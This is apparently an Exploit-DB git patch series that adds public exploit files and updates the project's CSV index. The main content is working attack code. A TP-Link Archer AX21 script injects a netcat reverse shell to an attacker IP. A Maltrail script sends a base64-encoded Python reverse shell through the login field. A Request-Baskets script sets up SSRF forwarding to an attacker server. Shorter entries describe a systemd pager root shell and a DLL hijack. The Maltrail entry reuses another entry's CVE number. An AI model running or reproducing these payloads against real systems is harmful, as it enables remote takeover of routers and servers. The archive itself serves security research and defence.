 6 files changed, 182 insertions(+)
 create mode 100755 exploits/hardware/remote/51677.py
 create mode 100644 exploits/linux/local/51674.txt
 create mode 100755 exploits/python/webapps/51675.sh
 create mode 100755 exploits/python/webapps/51676.py
 create mode 100644 exploits/windows/local/51678.txt

diff --git a/exploits/hardware/remote/51677.py b/exploits/hardware/remote/51677.py
new file mode 100755
index 0000000000..553ce53e0f
--- /dev/null
+++ b/exploits/hardware/remote/51677.py
@@ -0,0 +1,52 @@
+#!/usr/bin/python3
+#
+# Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection
+# Date: 07/25/2023
+# Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)
+# Vendor Homepage: https://www.tp-link.com/us/
+# Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)
+# Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0
+# CVE: CVE-2023-1389
+#
+# Disclaimer: This script is intended to be used for educational purposes only.
+# Do not run this against any system that you do not have permission to test.
+# The author will not be held responsible for any use or damage caused by this
+# program.
+#
+# CVE-2023-1389 is an unauthenticated command injection vulnerability in the web
+# management interface of the TP-Link Archer AX21 (AX1800), specifically, in the
+# *country* parameter of the *write* callback for the *country* form at the
+# "/cgi-bin/luci/;stok=/locale" endpoint. By modifying the country parameter it is
+# possible to run commands as root. Execution requires sending the request twice;
+# the first request sets the command in the *country* value, and the second request
+# (which can be identical or not) executes it.
+#
+# This script is a short proof of concept to obtain a reverse shell. To read more
+# about the development of this script, you can read the blog post here:
+# https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94
+# Before running the script, start a nc listener on your preferred port -> run the script -> profit
+
+import requests, urllib.parse, argparse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+# Suppress warning for connecting to a router with a self-signed certificate
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+# Take user input for the router IP, and attacker IP and port
+parser = argparse.ArgumentParser()
+
+parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")
+parser.add_argument("-a", "--attacker", dest = "attacker", default = "127.0.0.1", help="Attacker IP")
+parser.add_argument("-p", "--port",dest = "port", default = "9999", help="Local port")
+
+args = parser.parse_args()
+
+# Generate the reverse shell command with the attacker IP and port
+revshell = urllib.parse.quote("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + args.attacker + " " + args.port + " >/tmp/f")
+
+# URL to obtain the reverse shell
+url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"
+
+# Send the URL twice to run the command. Sending twice is necessary for the attack
+r = requests.get(url_command, verify=False)
+r = requests.get(url_command, verify=False)
\ No newline at end of file
diff --git a/exploits/linux/local/51674.txt b/exploits/linux/local/51674.txt
new file mode 100644
index 0000000000..e13f70eeee
--- /dev/null
+++ b/exploits/linux/local/51674.txt
@@ -0,0 +1,17 @@
+# Exploit Title: systemd 246 - Local Privilege Escalation
+# Exploit Author: Iyaad Luqman K (init_6)
+# Application: systemd 246
+# Tested on: Ubuntu 22.04
+# CVE: CVE-2023-26604
+
+systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user.
+This vulnerability allows a local attacker to gain root privileges.
+
+## Proof Of Concept:
+1. Run the systemctl command which can be run as root user.
+
+sudo /usr/bin/systemctl status any_service
+
+2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands.
+
+3. Type in `!/bin/sh` in the pager to spawn a shell as root user.
\ No newline at end of file
diff --git a/exploits/python/webapps/51675.sh b/exploits/python/webapps/51675.sh
new file mode 100755
index 0000000000..91a00fa2d6
--- /dev/null
+++ b/exploits/python/webapps/51675.sh
@@ -0,0 +1,53 @@
+# Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)
+# Exploit Author: Iyaad Luqman K (init_6)
+# Application: Request-Baskets v1.2.1
+# Tested on: Ubuntu 22.04
+# CVE: CVE-2023-27163
+
+
+# PoC
+#!/bin/bash
+
+
+if [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then
+    help="Usage: exploit.sh <URL> <TARGET>\n\n";
+    help+="Arguments:\n" \
+    help+=" URL            main path (/) of the server (eg. http://127.0.0.1:5000/)\n";
+    help+=" TARGET";
+
+    echo -e "$help";
+    exit 1;
+fi
+
+URL=$1
+ATTACKER_SERVER=$2
+
+if [ "${URL: -1}" != "/" ]; then
+    URL="$URL/";
+fi;
+
+BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");
+
+API_URL="$URL""api/baskets/$BASKET_NAME";
+
+PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";
+
+echo "> Creating the \"$BASKET_NAME\" proxy basket...";
+
+if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then
+    echo "> FATAL: Could not properly request $API_URL. Is the server online?";
+    exit 1;
+fi;
+
+BASKET_URL="$URL$BASKET_NAME";
+
+echo "> Basket created!";
+echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";
+
+if ! jq --help 1>/dev/null; then
+    echo "> Response body (Authorization): $response";
+else
+    echo "> Authorization: $(echo "$response" | jq -r ".token")";
+fi;
+
+exit 0;
\ No newline at end of file
diff --git a/exploits/python/webapps/51676.py b/exploits/python/webapps/51676.py
new file mode 100755
index 0000000000..95d1d9d5d5
--- /dev/null
+++ b/exploits/python/webapps/51676.py
@@ -0,0 +1,35 @@
+# Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)
+# Exploit Author: Iyaad Luqman K (init_6)
+# Application: Maltrail v0.53
+# Tested on: Ubuntu 22.04
+# CVE: CVE-2023-27163
+
+
+# PoC
+import sys;
+import os;
+import base64;
+
+def main():
+	listening_IP = None
+	listening_PORT = None
+	target_URL = None
+
+	if len(sys.argv) != 4:
+		print("Error. Needs listening IP, PORT and target URL.")
+		return(-1)
+
+	listening_IP = sys.argv[1]
+	listening_PORT = sys.argv[2]
+	target_URL = sys.argv[3] + "/login"
+	print("Running exploit on " + str(target_URL))
+	curl_cmd(listening_IP, listening_PORT, target_URL)
+
+def curl_cmd(my_ip, my_port, target_url):
+	payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
+	encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64
+	command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"
+	os.system(command)
+
+if __name__ == "__main__":
+  main()
\ No newline at end of file
diff --git a/exploits/windows/local/51678.txt b/exploits/windows/local/51678.txt
new file mode 100644
index 0000000000..0d3b4994f8
--- /dev/null
+++ b/exploits/windows/local/51678.txt
@@ -0,0 +1,20 @@
+# Exploit Title: OutSystems Service Studio 11.53.30 - DLL Hijacking
+# Date: 2023-08-09
+# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
+# Vendor Homepage: https://www.outsystems.com/
+# Version: Up to 11.53.30 (Build 61739)
+# Tested on: Windows
+# CVE : CVE-2022-47636
+
+A DLL hijacking vulnerability has been discovered in OutSystems Service
+Studio 11 11.53.30 build 61739.
+When a user open a .oml file (OutSystems Modeling Language), the
+application will load the following DLLs from the same directory:
+
+av_libGLESv2.dll
+libcef.DLL
+user32.dll
+d3d10warp.dll
+
+Using a crafted DLL, it is possible to execute arbitrary code in the
+context of the current logged in user.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e6ec5efa17..79d48f61a6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3939,6 +3939,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 829,exploits/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation",2005-02-19,MurDoK,remote,hardware,80,2005-02-18,,1,OSVDB-14023;CVE-2005-0494,,,,,
 10362,exploits/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Disclosure",2009-12-09,"AnTi SeCuRe",remote,hardware,,2009-12-08,,0,OSVDB-104795,,,,,
 40275,exploits/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Command Execution",2016-08-19,"Shadow Brokers",remote,hardware,,2016-08-19,2017-11-22,0,,,,,,
+51677,exploits/hardware/remote/51677.py,"TP-Link Archer AX21 - Unauthenticated Command Injection",2023-08-10,Voyag3r,remote,hardware,,2023-08-10,2023-08-10,0,CVE-2023-1389,,,,,
 38186,exploits/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,remote,hardware,,2015-09-15,2015-09-15,0,OSVDB-127536,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php
 26318,exploits/hardware/remote/26318.py,"TP-Link PS110U Print Server TL - Sensitive Information Enumeration",2013-06-19,SANTHO,remote,hardware,,2013-06-19,2013-06-19,0,OSVDB-94429,,,,,
 50962,exploits/hardware/remote/50962.py,"TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)",2022-06-14,"Tomas Melicher",remote,hardware,,2022-06-14,2022-06-14,0,CVE-2022-30075,,,,,
@@ -7734,6 +7735,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43935,exploits/linux/local/43935.txt,"systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation",2018-01-29,"Michael Orlitzky",local,linux,,2018-01-31,2018-01-31,0,CVE-2017-18078,,,,,http://seclists.org/oss-sec/2018/q1/115
 45715,exploits/linux/local/45715.txt,"systemd - 'chown_one()' Dereference Symlinks",2018-10-29,"Google Security Research",local,linux,,2018-10-29,2018-11-17,1,CVE-2018-15687,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1689
 41171,exploits/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation",2017-01-24,"Sebastian Krahmer",local,linux,,2017-01-26,2019-03-07,0,CVE-2016-10156,,,,,http://www.openwall.com/lists/oss-security/2017/01/24/4
+51674,exploits/linux/local/51674.txt,"systemd 246 - Local Privilege Escalation",2023-08-10,"Iyaad Luqman K",local,linux,,2023-08-10,2023-08-10,1,CVE-2023-26604,,,,,
 15620,exploits/linux/local/15620.sh,"SystemTap - Local Privilege Escalation",2010-11-26,"Tavis Ormandy",local,linux,,2010-11-26,2010-11-26,1,CVE-2010-4170;OSVDB-69489,,,http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2010-11-26-at-62953-am.png,,
 33604,exploits/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",local,linux,,2010-02-05,2014-06-01,1,CVE-2010-0411;OSVDB-62131,,,,,https://www.securityfocus.com/bid/38120/info
 46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,,2019-04-19,2019-04-19,1,CVE-2010-4170,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb
@@ -34652,6 +34654,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,
 51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,,
+51676,exploits/python/webapps/51676.py,"Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-08-10,1,CVE-2023-27163,,,,,
 40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz,
 51276,exploits/python/webapps/51276.go,"modoboa  2.0.4 - Admin TakeOver",2023-04-06,7h3h4ckv157,webapps,python,,2023-04-06,2023-04-06,0,CVE-2023-0777,,,,,
 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,,
@@ -34662,6 +34665,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51532,exploits/python/webapps/51532.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-20,2023-06-20,1,CVE-2023-0297,,,,,
 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
 51669,exploits/python/webapps/51669.txt,"Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)",2023-08-08,"Daniel Barros",webapps,python,,2023-08-08,2023-08-08,0,CVE-2023-29689,,,,,
+51675,exploits/python/webapps/51675.sh,"Request-Baskets v1.2.1 - Server-side request forgery (SSRF)",2023-08-10,"Iyaad Luqman K",webapps,python,,2023-08-10,2023-08-10,1,CVE-2023-27163,,,,,
 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,
 51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,,
@@ -41095,6 +41099,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51128,exploits/windows/local/51128.txt,"Outline V1.6.0 - Unquoted Service Path",2023-03-29,"Milad karimi",local,windows,,2023-03-29,2023-03-29,0,,,,,,
 21096,exploits/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,local,windows,,2001-08-30,2012-09-10,1,OSVDB-11941,,,,,https://www.securityfocus.com/bid/3271/info
 29465,exploits/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Local Privilege Escalation",2007-01-15,"Matousec Transparent security",local,windows,,2007-01-15,2013-11-12,1,CVE-2007-0333;OSVDB-33480,,,,http://www.exploit-db.comoutpost_firewall_pro_v4.0_build_1005.590.123.zip,https://www.securityfocus.com/bid/22069/info
+51678,exploits/windows/local/51678.txt,"OutSystems Service Studio 11.53.30 - DLL Hijacking",2023-08-10,shinnai,local,windows,,2023-08-10,2023-08-10,0,CVE-2022-47636,,,,,
 47658,exploits/windows/local/47658.txt,"oXygen XML Editor 21.1.1 - XML External Entity Injection",2019-11-14,"Pablo Santiago",local,windows,,2019-11-14,2019-11-14,0,,,,,,
 920,exploits/windows/local/920.c,"P2P Share Spy 2.2 - Local Password Disclosure",2005-04-07,Kozan,local,windows,,2005-04-06,,1,OSVDB-15312;CVE-2005-1097,,,,,
 44900,exploits/windows/local/44900.txt,"Pale Moon Browser < 27.9.3 - Use After Free (PoC)",2018-06-18,"Berk Cem Göksel",local,windows,,2018-06-18,2018-06-19,0,CVE-2018-12292,"Use After Free (UAF)",,,,

From 6da2bca764bf7549be973641a06ee1e4d9189751 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Sat, 12 Aug 2023 00:16:26 +0000
Subject: [PATCH 06/17] DB: 2023-08-12

1 changes to exploits/shellcodes/ghdb

projectSend r1605 - CSV injection
projectSend r1605 - Private file download
projectSend r1605 - CSV injection
projectSend r1605 - Private file download

projectSend r1605 - Stored XSS
---
 files_exploits.csv | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/files_exploits.csv b/files_exploits.csv
index 79d48f61a6..2b7da2405a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -28203,10 +28203,10 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,webapps,php,,2008-02-18,2014-01-28,1,CVE-2008-5584;OSVDB-42376,,,,,https://www.securityfocus.com/bid/27857/info
 35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",webapps,php,,2014-12-16,2014-12-16,0,OSVDB-116469;CVE-2014-9567,,,,http://www.exploit-db.comProjectSend-r561.zip,
 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
-51517,exploits/php/webapps/51517.txt,"projectSend r1605 - CSV injection",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-06-14,0,,,,,,
-51400,exploits/php/webapps/51400.txt,"projectSend r1605 - Private file download",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
+51517,exploits/php/webapps/51517.txt,"projectSend r1605 - CSV injection",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-08-11,1,,,,,,
+51400,exploits/php/webapps/51400.txt,"projectSend r1605 - Private file download",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-08-11,1,,,,,,
 51238,exploits/php/webapps/51238.txt,"projectSend r1605 - Remote Code Exectution RCE",2023-04-05,"Mirabbas Ağalarov",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
-51518,exploits/php/webapps/51518.txt,"projectSend r1605 - Stored XSS",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-06-14,0,,,,,,
+51518,exploits/php/webapps/51518.txt,"projectSend r1605 - Stored XSS",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-08-11,1,,,,,,
 35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80,2014-12-19,2014-12-27,0,CVE-2014-1155;CVE-2011-3713;CVE-2014-9580,,,,http://www.exploit-db.comProjectSend-r561.zip,
 36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",webapps,php,80,2015-03-06,2015-03-06,0,OSVDB-119169;CVE-2015-2564,,,,http://www.exploit-db.comProjectSend-r561.zip,
 39588,exploits/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",webapps,php,80,2016-03-21,2016-03-21,0,,,,,http://www.exploit-db.comProjectSend-r582.zip,

From 500cf5a2e07b63c279579e47fba40a5b0feb01cc Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Sun, 20 Aug 2023 00:16:58 +0000
Subject: [PATCH 07/17] DB: 2023-08-20

1 changes to exploits/shellcodes/ghdb

Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)

Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)

Online Shopping Cart System 1.0 - 'id' SQL Injection

Online Thesis Archiving System v1.0 - Multiple-SQLi
WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)
WebsiteBaker v2.13.3 - Directory Traversal
WebsiteBaker v2.13.3 - Stored XSS
WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)
WebsiteBaker v2.13.3 - Directory Traversal
WebsiteBaker v2.13.3 - Stored XSS
---
 files_exploits.csv | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/files_exploits.csv b/files_exploits.csv
index 2b7da2405a..dc91085d87 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -16822,7 +16822,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15853,exploits/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection",2010-12-29,kalashnikov,webapps,php,,2010-12-29,2010-12-29,0,,,,,,
 8727,exploits/php/webapps/8727.txt,"DGNews 3.0 Beta - 'id' SQL Injection",2009-05-18,Cyber-Zone,webapps,php,,2009-05-17,,1,OSVDB-54658;CVE-2009-1746,,,,,
 32567,exploits/php/webapps/32567.txt,"DHCart 3.84 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2008-11-04,Lostmon,webapps,php,,2008-11-04,2014-03-28,1,CVE-2008-6297;OSVDB-49556,,,,,https://www.securityfocus.com/bid/32117/info
-51529,exploits/php/webapps/51529.txt,"Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)",2023-06-19,tmrswrr,webapps,php,,2023-06-19,2023-06-19,0,,,,,,
+51529,exploits/php/webapps/51529.txt,"Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)",2023-06-19,tmrswrr,webapps,php,,2023-06-19,2023-08-19,1,,,,,,
 15969,exploits/php/webapps/15969.txt,"diafan.cms 4.3 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",webapps,php,,2011-01-11,2011-01-11,0,OSVDB-70399;CVE-2011-5318,,,,,http://www.htbridge.ch/advisory/xsrf_csrf_in_diafan_cms.html
 34414,exploits/php/webapps/34414.txt,"DiamondList - '/user/main/update_category?category[description]' Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-3023;OSVDB-67124,,,,,https://www.securityfocus.com/bid/42252/info
 34413,exploits/php/webapps/34413.txt,"DiamondList - '/user/main/update_settings?setting[site_title]' Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-3023;OSVDB-67123,,,,,https://www.securityfocus.com/bid/42252/info
@@ -24681,7 +24681,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39167,exploits/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",webapps,php,80,2016-01-05,2016-01-05,0,OSVDB-132611;OSVDB-132610,,,,http://www.exploit-db.comOABSv1.7.zip,
 47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php,80,2019-09-09,2019-09-10,0,,"SQL Injection (SQLi)",,,,
 51337,exploits/php/webapps/51337.txt,"Online Appointment System V1.0 - Cross-Site Scripting (XSS)",2023-04-08,"Sanjay Singh",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
-51524,exploits/php/webapps/51524.py,"Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)",2023-06-15,"Ramil Mustafayev",webapps,php,,2023-06-15,2023-06-15,0,,,,,,
+51524,exploits/php/webapps/51524.py,"Online Art gallery project 1.0 - Arbitrary File Upload (Unauthenticated)",2023-06-15,"Ramil Mustafayev",webapps,php,,2023-06-15,2023-08-19,1,,,,,,
 50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-05,"Subhadip Nag",webapps,php,,2021-07-05,2021-07-05,0,,,,,,
 47922,exploits/php/webapps/47922.txt,"Online Book Store 1.0 - 'bookisbn' SQL Injection",2020-01-15,"Ertebat Gostar Co",webapps,php,,2020-01-15,2020-01-15,0,,,,,,
 48775,exploits/php/webapps/48775.txt,"Online Book Store 1.0 - 'id' SQL Injection",2020-08-31,"Moaaz Taha",webapps,php,,2020-08-31,2020-08-31,0,,,,,,
@@ -24823,7 +24823,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48771,exploits/php/webapps/48771.txt,"Online Shopping Alphaware 1.0 - 'id' SQL Injection",2020-08-28,"Moaaz Taha",webapps,php,,2020-08-28,2020-08-28,0,,,,,,
 48725,exploits/php/webapps/48725.txt,"Online Shopping Alphaware 1.0 - Authentication Bypass",2020-07-30,"Ahmed Abbas",webapps,php,,2020-07-30,2020-07-30,0,,,,,,
 49131,exploits/php/webapps/49131.txt,"Online Shopping Alphaware 1.0 - Error Based SQL injection",2020-12-01,"Moaaz Taha",webapps,php,,2020-12-01,2020-12-01,0,,,,,,
-49423,exploits/php/webapps/49423.txt,"Online Shopping Cart System 1.0 - 'id' SQL Injection",2021-01-14,"Aydın Baran Ertemir",webapps,php,,2021-01-14,2021-01-14,0,,,,,,
+49423,exploits/php/webapps/49423.txt,"Online Shopping Cart System 1.0 - 'id' SQL Injection",2021-01-14,"Aydın Baran Ertemir",webapps,php,,2021-01-14,2023-08-19,1,,,,,,
 48647,exploits/php/webapps/48647.txt,"Online Shopping Portal 3.1 - 'email' SQL Injection",2020-07-07,gh1mau,webapps,php,,2020-07-07,2020-07-07,0,,,,,,
 48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,,
 50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,,
@@ -24838,7 +24838,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 18035,exploits/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,webapps,php,,2011-10-26,2011-12-21,0,OSVDB-76573;CVE-2011-5185,,,,,
 43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80,2018-02-07,2018-02-07,1,,"SQL Injection (SQLi)",,,,
 50597,exploits/php/webapps/50597.txt,"Online Thesis Archiving System 1.0 - SQLi Authentication Bypass",2021-12-14,"Yehia Elghaly",webapps,php,,2021-12-14,2021-12-14,0,,,,,,
-51521,exploits/php/webapps/51521.txt,"Online Thesis Archiving System v1.0 - Multiple-SQLi",2023-06-14,nu11secur1ty,webapps,php,,2023-06-14,2023-06-14,0,,,,,,
+51521,exploits/php/webapps/51521.txt,"Online Thesis Archiving System v1.0 - Multiple-SQLi",2023-06-14,nu11secur1ty,webapps,php,,2023-06-14,2023-08-19,1,,,,,,
 49277,exploits/php/webapps/49277.txt,"Online Tours & Travels Management System 1.0 - _id_ SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,,2020-12-17,2020-12-17,0,,,,,,
 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,,2018-07-04,2018-07-04,0,CVE-2018-12908,,,,,
 50218,exploits/php/webapps/50218.txt,"Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)",2021-08-20,"Justin White",webapps,php,,2021-08-20,2021-08-20,0,,,,,,
@@ -32256,9 +32256,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11883,exploits/php/webapps/11883.txt,"WebsiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,webapps,php,,2010-03-24,,1,,,,,,
 35277,exploits/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",webapps,php,80,2014-11-17,2014-11-17,0,OSVDB-114748;OSVDB-114747;OSVDB-114746;OSVDB-114745;OSVDB-114744;OSVDB-114743;OSVDB-114742;OSVDB-114741;CVE-2014-9243;CVE-2014-9242,,,,http://www.exploit-db.comwb283-sp3.tar.gz,
 23993,exploits/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",webapps,php,,2013-01-09,2013-01-09,1,OSVDB-89046;OSVDB-89045,,,,http://www.exploit-db.comconcertcalendar-v2.2.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt
-51349,exploits/php/webapps/51349.txt,"WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)",2023-04-08,"Mirabbas Ağalarov",webapps,php,,2023-04-08,2023-04-08,0,,,,,,
-51554,exploits/php/webapps/51554.txt,"WebsiteBaker v2.13.3 - Directory Traversal",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
-51553,exploits/php/webapps/51553.txt,"WebsiteBaker v2.13.3 - Stored XSS",2023-07-03,"Mirabbas Ağalarov",webapps,php,,2023-07-03,2023-07-03,0,,,,,,
